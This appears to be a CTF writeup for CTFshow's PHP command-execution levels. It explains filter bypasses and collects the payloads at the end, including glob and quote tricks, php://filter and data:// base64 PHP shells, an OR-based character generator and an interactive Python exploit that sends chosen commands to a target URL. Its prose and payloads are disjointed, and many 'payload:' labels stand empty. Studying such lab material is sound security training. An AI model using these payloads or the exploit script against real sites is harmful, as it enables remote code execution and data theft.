[Original] CTFSHOW Command Execution Writeup
Posted: 2021-9-22 17:26 · 27505


`flag` is filtered.

payload:

A few tricks, in no particular order.

`flag|system|php` are filtered.

With `system` gone, run the command inside backticks and `echo` the result.

payload:

Filtered: `flag|system|php|cat|sort|shell|\.| |` (note that the space itself is on the list).

No problem, we have plenty of tricks left.

payload:

`include` does not need parentheses, and the semicolon can be replaced by `?>` (the closing tag terminates the statement).

payload:

payload:

payload:

`flag` is filtered (this level does `include($c)` rather than `eval`).

payload:

payload:

In principle this is the bitwise-construction trick; the regex at this level bans `^`, so the characters are built with `|` (OR) rather than XOR.

Then I got lazy.

Here's the exp:

The exp is borrowed from another writeup.

`>/dev/null 2>&1` sends both output streams (stdout and stderr) to the null device, where they are discarded. The redirection is attached only to the last simple command on the line, though, so anything that runs before a command separator still prints.

Cut the line off before the redirection with `%0a` (newline), `%26` (`&`) or `||`.

payload:
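To make the redirect point concrete, here is an added bash example (not part of the original writeup; the commands are constructed for the demo) that mimics `system($c . " >/dev/null 2>&1")` with `$c` attacker-controlled. It shows that each separator leaves the first command's output visible while a plain command really is silenced, and includes the quick regex check for which separators survive the next level's ban on `;`:

```bash
#!/bin/bash
# Added example, not code from the original writeup. Mimics the level's
# system($c . " >/dev/null 2>&1") with $c attacker-controlled, to show that the
# redirection is attached only to the last simple command on the line.

run_like_target() {          # $1 = attacker-supplied $c, evaluated as the target would
    sh -c "$1 >/dev/null 2>&1"
}

# Separators named in the writeup: ';' first, then %0a (newline), %26 (&) and
# || once ';' is banned. The left-hand command runs with stdout untouched.
sep_semicolon() { run_like_target 'echo visible;echo hidden'; }
sep_newline()   { run_like_target "$(printf 'echo visible\necho hidden')"; }
sep_amp()       { run_like_target 'echo visible&echo hidden'; }   # left side runs in the background
sep_or()        { run_like_target 'echo visible||echo hidden'; }  # right side only runs if the left fails

# Control case: with no separator the redirect really does swallow everything.
no_separator()  { run_like_target 'echo visible'; }

# Pre-flight check: does a separator survive a given preg_match ban list?
# $1 = separator string, $2 = the alternatives inside the target's regex
separator_allowed() { ! printf '%s' "$1" | grep -Eq "$2"; }
```

Each `sep_*` function prints `visible` and nothing else; `no_separator` prints nothing. `separator_allowed ';' ';|cat'` fails while `separator_allowed '||' ';|cat'` succeeds, which is exactly why the writeup switches separators at the next level.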

`;` and `cat` are filtered.

payload:

`flag` is filtered as well.

Wildcards take care of it.

payload:

The space character is filtered.

payload:

Filtered: `\;|cat|flag| |[0-9]|\\$|\*` (so `${IFS}` and `*` are gone too).

payload:

payload:

payload:

payload:

payload:
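As an added example (not from the original writeup; the scratch directory, file names and flag value are constructed for the demo), the following bash script shows why each payload form from the levels above still opens `flag.php` even though the string `flag`, and later a space, never appears in the command text. It also includes the pre-flight regex check a tester would run against a level's ban list before submitting, and notes in the comments which space bypass dies at which ban:

```bash
#!/bin/bash
# Added example, not code from the original writeup. Everything runs in a
# throwaway directory; flag.php and its contents are constructed for the demo.
set -u
WORKDIR=$(mktemp -d)
trap 'rm -rf "$WORKDIR"' EXIT
cd "$WORKDIR"
printf '<?php\n$flag="ctfshow{constructed-demo-flag}";\n' > flag.php
printf '<?php\n// stand-in for index.php\n' > index.php

# Each function runs its command through sh -c, the way PHP's system() does.
# The string "flag" never appears in the command text, yet every one of them
# reads flag.php, because the shell turns the text back into the file name
# after the regex has already run on the original text.
via_glob_question() { sh -c 'nl fl??????'; }     # ? matches exactly one character
via_glob_star()     { sh -c 'nl fl*'; }          # * works until the level that bans it
via_empty_quotes()  { sh -c "nl fla''g.php"; }   # '' disappears during quote removal
via_backslash()     { sh -c 'nl fla\g.php'; }    # \g is an escaped g, i.e. just g

# Once the space is banned as well:
via_ifs()           { sh -c 'nl${IFS}fla\g.php'; }              # dies when $ is banned
via_tab()           { sh -c "$(printf 'nl\tfla\\g.php')"; }     # %09 in the URL; decoded before the regex runs, so [0-9] does not catch it
via_redirect()      { sh -c 'nl<fla\g.php'; }                   # no argument word at all, nl reads stdin

# Pre-flight check: does the command text survive the level's regex?
# $1 = command string, $2 = the alternatives inside preg_match's /.../i
passes_filter() { ! printf '%s' "$1" | grep -Eiq "$2"; }

# Pull the flag out of whatever a technique printed, for comparison.
flag_via() { "$1" | grep -o 'ctfshow{[^}]*}'; }
```

`flag_via via_glob_question` and the other six all return the same flag string; `passes_filter 'echo \`nl fla""g.p""hp\`' 'flag|system|php'` succeeds while `passes_filter 'nl flag.php' 'flag|system|php'` fails, which is the check worth running before every submission.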

= = Only digits are allowed.

Sorry, the dirty tricks start here.

payload:


Request packet:

Make it add up to 36.

The bitwise complement of -37 is 36 (`~x == -x-1`, so `~(-37) == 36`).

payload:

Bypassing disable_functions

I can only think of one way.

`file()` reads the file into an array, which is then printed.

payload:

payload:

payload:

= = Good grief, they banned a lot.

payload:

ob_get_contents: return the contents of the output buffer. ob_end_clean: clean (erase) the output buffer and turn off output buffering.

This function discards the contents of the topmost output buffer and turns that buffer off. To process the buffer's contents further you must call ob_get_contents() before ob_end_clean(), because the contents are discarded when ob_end_clean() is called.

y4's blog explains it clearly.

payload:

Just read y4's blog = = I'm not pasting the payload, it's too long.

## web73

Have a look at the directory listing.

Then:

payload:

Same as web73.

Enumerate the directory.

Read the file with MySQL `load_file`.

I'm not really sure how this challenge is meant to be solved,

but I reproduced it.


 
 
/?c=system("nl fl??????");
/?c=system("nl fl*");
/?c=system("nl fla''g.php");
/?c=echo `nl fla""g.php`;
/?c=echo `nl fla\g.php`;
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=eval($_GET[1]);&1=system('nl flag.php');
I don't know the rest.
 
 
/?c=echo `nl fla""g.p""hp`;
/?c=echo `nl fla?????`;
/?c=echo `nl f*`;
/?c=eval($_GET[1]);&1=system('nl flag.php');
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
 
 
/?c=highlight_file(next(array_reverse(scandir(dirname(__FILE__)))));
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
 
/?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
/?c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;   
    }
}else{
    highlight_file(__FILE__);
}
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
/?c=data://text/plain,<?php system("nl fla*");?>
 
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
/?c=data://text/plain,<?php%20system("nl%20f*");?>
 
 
import re

content = ''
# The same character classes the target's preg_match bans, case-insensitive.
# No PHP-style /.../ delimiters here: with them the first and last alternatives
# become "/[0-9]" and "\-/", so digits and '-' slip through and the generated
# pairs get rejected by the target.
preg = re.compile(r'[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-', re.I)
for i in range(256):
    for j in range(256):
        if not (preg.match(chr(i)) or preg.match(chr(j))):
            k = i | j
            if 32 <= k <= 126:          # the OR result must be a printable character
                a = '%' + hex(i)[2:].zfill(2)
                b = '%' + hex(j)[2:].zfill(2)
                # one line per usable pair: <char> <%hex_i> <%hex_j>
                content += chr(k) + ' ' + a + ' ' + b + '\n'
with open('rce_or.txt', 'w') as f:
    f.write(content)
# -*- coding: utf-8 -*-
import os
import sys
import urllib.parse

import requests

# Generates rce_or.txt; if php is not on your PATH run it by hand
# (the Python generator above writes the same file).
os.system("php rce_or.php")
if len(sys.argv) != 2:
    print("=" * 50)
    print('USAGE: python exp.py <url>')
    print("eg:  python exp.py http://<target>/")
    print("=" * 50)
    sys.exit(0)
url = sys.argv[1]


def action(arg):
    """Look up each character of arg in rce_or.txt and return a PHP
    expression ("%xx%xx..."|"%yy%yy...") whose bytewise OR spells arg."""
    s1 = ""
    s2 = ""
    for ch in arg:
        with open("rce_or.txt", "r") as f:
            for line in f:
                # line format: <char> <%hex1> <%hex2>; take the first pair found
                if line[0] == ch:
                    s1 += line[2:5]
                    s2 += line[6:9]
                    break
    return '("' + s1 + '"|"' + s2 + '")'


while True:
    # (function)(command), e.g. system and ls: PHP calls the OR-built string
    param = action(input("\n[+] your function:")) + action(input("[+] your command:"))
    data = {
        'c': urllib.parse.unquote(param)
    }
    r = requests.post(url, data=data)
    print("\n[*] result:\n" + r.text)

